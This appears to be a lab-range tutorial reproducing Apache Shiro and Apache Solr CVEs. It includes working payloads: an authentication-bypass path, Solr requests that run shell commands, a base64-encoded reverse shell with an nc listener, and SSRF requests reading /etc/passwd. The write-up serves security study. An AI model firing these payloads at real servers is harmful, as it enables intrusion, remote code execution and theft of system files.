Article directory
- Service Attack and Defense – Framework Security &CVE Recurrence &Apache Shiro &Apache Solr Vulnerability Recurrence
-
- Middleware list
- Common development frameworks
- Apache Shiro – Component Framework Security
-
- Exposed security issues
- Vulnerability recurrence
-
- Apache Shiro Authentication Bypass Vulnerability (CVE-2020-1957)
- CVE-2020-11989 Authentication Bypass Vulnerability
- CVE_2016_4437 Shiro-550 & amp; & amp; CVE-2019-12422 Shiro-721 vulnerability reappears
- Apache Solr-Component Framework Security
-
- Disclosed security issues
- Vulnerability recurrence
-
- Apache Solr remote command execution vulnerability (CVE-2017-12629)
- Arbitrary file reading & command execution (CVE-2019-17558)
- Remote command execution vulnerability (CVE-2019-0193)
- Solr Arbitrary File Reading & & SSRF (CVE-2021-27905)
Service Attack and Defense-Framework Security &CVE Recurrence &Apache Shiro &Apache Solr Vulnerability Recurrence
Middleware list
Middleware and framework list:
IIS, Apache, Nginx, Tomcat, Docker, K8s, Weblogic, JBoos, WebSphere, Jenkins, GlassFish, Jetty, Jira, Struts2, Laravel, Solr, Shiro, Thinkphp, Spring, Flask, jQuery, etc.
Common development frameworks
1. Development framework-PHP-Laravel-Thinkphp
2. Development framework-Javaweb-St2-Spring
3. Development framework-Python-django-Flask
4. Development framework-Javascript-Node.js-JQuery
5. Other frameworks-Java-Apache Shiro & Apache Sorl
Common language development frameworks:
PHP: Thinkphp Laravel YII CodeIgniter CakePHP Zend etc.
JAVA: Spring MyBatis Hibernate Struts2 Springboot etc.
Python: Django Flask Bottle Turbobars Tornado Web2py etc.
Javascript: Vue.js Node.js Bootstrap JQuery Angular etc.
Apache Shiro-Component Framework Security
Detailed explanation: shiro (java security framework)
Apache Shiro is a powerful and easy-to-use Java security framework that performs authentication, authorization, password and session management. Using Shiro’s easy-to-understand API, you can quickly and easily get any application, from the smallest mobile app to the largest web and enterprise applications.
Exposed security issues
Apache Shiro <= 1.2.4 default key causes command execution vulnerability [CVE-2016-4483]
Apache Shiro < 1.3.2 Authentication Bypass Vulnerability [CVE-2016-2807]
Apache Shiro < 1.4.2 cookie oracle padding vulnerability [CVE-2019-12442]
Apache Shiro < 1.5.2 Authentication Bypass Vulnerability [CVE-2020-1957]
Apache Shiro < 1.5.3 Authentication Bypass Vulnerability [CVE-2020-11989]
Apahce Shiro < 1.6.0 Authentication Bypass Vulnerability [CVE-2020-13933]
Apahce Shiro < 1.7.1 Permission Bypass Vulnerability [CVE-2020-17523]
…
Vulnerability Recurrence
Apache Shiro Authentication Bypass Vulnerability (CVE-2020-1957)
Apache Shiro is a powerful and easy-to-use Java security framework that performs authentication, authorization, encryption, and session management.
In versions of Apache Shiro with Spring Dynamic Controller before 1.5.2, an attacker could bypass directory authentication by crafting a maliciously crafted request.
..;
Scope of impact: Apache Shiro < 1.5.3
Shooting range: vulhub
Reference: Apache Shiro authentication bypass vulnerability (CVE-2020-1957) reappears
Start the environment:
To access the web interface:
Direct requests to the administration page are inaccessible and will be redirected to the login page. /admin/
Construct malicious requests to bypass authentication checks and access administrative pages.
payload: /xxx/..;/admin/
http://you-ip:8080/xxx/..;/admin/
CVE-2020-11989 Authentication Bypass Vulnerability
When using Apache Shiro with Spring controllers, specially crafted requests may lead to authentication bypass.
Shooting range: vulfocus
Start the environment:
To access the web interface:
Poc: /admin/
Scope of impact: Apache Shiro < 1.7.1
There may be a problem in the environment, which cannot be bypassed. You can use the project on github for testing.
Project address: shiro-cve-2020-17523
Just build it after the download is complete. Please refer to the documentation for details.
CVE_2016_4437 Shiro-550 & amp; & amp; CVE-2019-12422 Shiro-721 vulnerability recurrence
Vulnerability principle and reproduction process:
shiro Deserialization VulnerabilityShiro-550/Shiro-721 Deserialization
Apache Solr-Component Framework Security
Detailed explanation: Solr detailed explanation
Apache Solr is an open source search service developed using Java language and mainly based on HTTP and
Implemented by Apache Lucene. Solr is a high-performance, fully developed Java5-based Lucene
Text search server.Solr is an independent enterprise-level search application server that provides an API interface similar to Web-service. Users can submit XML files in a certain format to the search engine server through http requests to generate indexes; they can also make search requests through Http Get operations and get returned results in XML format.
Security issues disclosed
Remote Command Execution RCE (CVE-2017-12629)
Remote Command Execution XXE (CVE-2017-12629)
Arbitrary file read AND command execution (CVE-2019-17558)
Remote command execution vulnerability (CVE-2019-0192)
Remote command execution vulnerability (CVE-2019-0193)
Unauthorized upload vulnerability (CVE-2020-13957)
Apache Solr SSRF (CVE-2021-27905)
…
Vulnerability Recurrence
Apache Solr remote command execution vulnerability (CVE-2017-12629)
Apache Solr is an open source search server. Solr is developed using Java language and is mainly implemented based on HTTP and Apache Lucene. The principle is roughly that documents are added to a search collection through Http using XML. Querying the collection is also achieved by receiving an XML/JSON response via http.
A total of two vulnerabilities were discovered in versions before 7.1.0 this time: XML Entity Extension Vulnerability (XXE) and Remote Command Execution Vulnerability (RCE). The two can be connected to form an exploit chain, and both are numbered CVE-2017-12629.
Environment: vulhub
Reference: CVE-2017-12629-RCE recurrence
Start the environment:
To access the web interface:
use:
First create a listener, set the value of exe to the command we want to execute, and the value of args are the command parameters:
//Data packet content: POST /solr/demo/config HTTP/1.1 Host: 192.168.100.134:8983 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Connection: close Content-Length: 161 {<!-- -->"add-listener":{<!-- -->"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe ":"sh","dir":"/bin/","args":["-c", "touch /tmp/rumilc.txt"]}}
Then perform an update operation to trigger the listener just added:
//Data packet content: POST /solr/demo/update HTTP/1.1 Host: 192.168.100.134:8983 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Connection: close Content-Type: application/json Content-Length: 15 [{<!-- -->"id":"test"}]
verify:
docker ps view container id docker exec -it container id bash
Created successfully
The command can be replaced with a rebound shell command to perform a rebound shell. The logical idea remains unchanged. The command needs to be base64 encoded.
Arbitrary file reading & command execution (CVE-2019-17558)
Solr is a popular, ultra-fast open source enterprise search platform built on Apache Lucene(TM).
Apache Velocity is a Java-based template engine that provides a template language to reference objects defined by Java code. Velocity is an open source software project under the Apache Foundation that aims to ensure the isolation between the presentation layer and the business logic layer of web applications (ie, the MVC design pattern). An input validation error vulnerability exists in Apache Solr versions 5.0.0 to 8.3.1. An attacker can use the customized Velocity template function to exploit the Velocity-SSTI vulnerability to execute arbitrary code on the Solr system.
Shooting range: vulfocus
Start the environment:
To access the web interface:
Manual Reproduction Reference: Apache Solr Remote Code Execution via Velocity Custom Template
Script tool: EXP address
The script is completed in one step and the command is executed:
python2 solr_rce.py http://192.168.100.134:14226 id
python2 solr_rce.py http://192.168.100.134:14226 whoami
Read/view files:
python2 solr_rce.py http://192.168.100.134:14226 "cat /etc/passwd"
Remote command execution vulnerability (CVE-2019-0193)
Apache Solr < 8.2.0 version
Apache Solr is an open source search server. Solr is developed using Java language and is mainly implemented based on HTTP and Apache Lucene. The vulnerability occurs in Apache Solr’s DataImportHandler, an optional but commonly used module used to extract data from databases and other sources. It has a feature where all DIH configurations can be set via the dataConfig parameter of external requests. Because DIH configurations can contain scripts, attackers can craft dangerous requests that can lead to remote command execution.
Shooting range: vulhub
Reference: Recurrence of Apache Solr remote command execution vulnerability (CVE-2019-0193)
Start the environment:
To access the web interface:
You need to log in when you first come up, and you need the status after logging in.
Execute command: docker-compose exec solr bash bin/solr create_core -c test -d example/example-DIH/solr/db
After the command is successfully executed, you need to wait for a while, and then you can view the Apache solr management page by accessing it without logging in.
Next, first open the core you just created, select the Dataimport function and select debug mode:
Fill in the following POC: test
<dataConfig> <dataSource type="URLDataSource"/> <script><![CDATA[ function poc(){<!-- --> java.lang.Runtime.getRuntime().exec("touch /tmp/rumilc.txt"); } ]]></script> <document> <entity name="stackoverflow" url="https://stackoverflow.com/feeds/tag/solr" processor="XPathEntityProcessor" forEach="/feed" transformer="script:poc" /> </document> </dataConfig>
Click Execute with this Confuguration
to execute
After execution, wait for a while:
verify:
docker ps docker exec -it container id bash
Created successfully
The command can be replaced with a rebound shell command, which requires base64 encoding. Try rebounding:
sh -i > & amp; /dev/tcp/192.168.100.1/8888 0> & amp;1 After encoding: bash -c {<!-- -->echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDA + JjE=}|{<!-- -->base64,-d}|{<!-- -->bash,-i}
POC:
<dataConfig> <dataSource type="URLDataSource"/> <script><![CDATA[ function poc(){ java.lang.Runtime.getRuntime().exec("bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4xMDAuMS84ODg4IDA + JjE=}|{base64,-d}|{bash,-i}"); } ]]></script> <document> <entity name="stackoverflow" url="https://stackoverflow.com/feeds/tag/solr" processor="XPathEntityProcessor" forEach="/feed" transformer="script:poc" /> </document> </dataConfig>
Turn on monitoring on the listening end
nc -lvvp 8888
After execution, wait a moment:
Successful rebound shell:
Solr arbitrary file reading & amp; & amp; SSRF (CVE-2021-27905)
Apache Solr is an open source search server. This vulnerability is due to the fact that the input content is not verified. An attacker can use this vulnerability to construct malicious data and perform SSRF attacks without authorization, ultimately causing arbitrary reading of files on the server. When Apache Solr does not enable authentication, an attacker can directly construct requests to enable specific configurations and ultimately lead to SSRF or arbitrary file reads.
Shooting range: vulhub
Reference: Apache Solr RemoteStreaming Arbitrary File Reading and SSRF
Start the environment:
To access the web interface:
use:
//First, access to extract the database name: http://your-ip:8983/solr/admin/cores?indexInfo=false & amp;wt=json
Send the following request to modify the database configuration and enable it: demo
RemoteStreaming
//The data package is as follows: POST /solr/demo/config HTTP/1.1 Host: 192.168.100.134:8983 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 Accept: text/html,application/xhtml + xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br DNT: 1 Connection: close Upgrade-Insecure-Requests: 1 Content-Type: application/json Content-Length: 80 {<!-- -->"set-property":{<!-- -->"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
Send packet:
Then read an arbitrary file via: stream.url
//curl -i -s -k 'http://your-ip:8983/solr/demo/debug/dump param=ContentStreams & amp;stream.url=file:///etc/passwd' curl -i -s -k "http://your-ip:8983/solr/demo/debug/dump?param=ContentStreams & stream.url=file:///etc/passwd"
Read successfully:
View group information:
curl -i -s -k "http://your-ip:8983/solr/demo/debug/dump?param=ContentStreams & stream.url=file:///etc/group"
For other development framework security issues and vulnerability recurrence, please refer to:
Framework Security-CVE Recurrence & Spring & Struts & Laravel & ThinkPHP Vulnerability Recurrence
Framework Security-CVE Vulnerability Recurrence & Django & Flask & Node.js & JQuery Framework Vulnerability Recurrence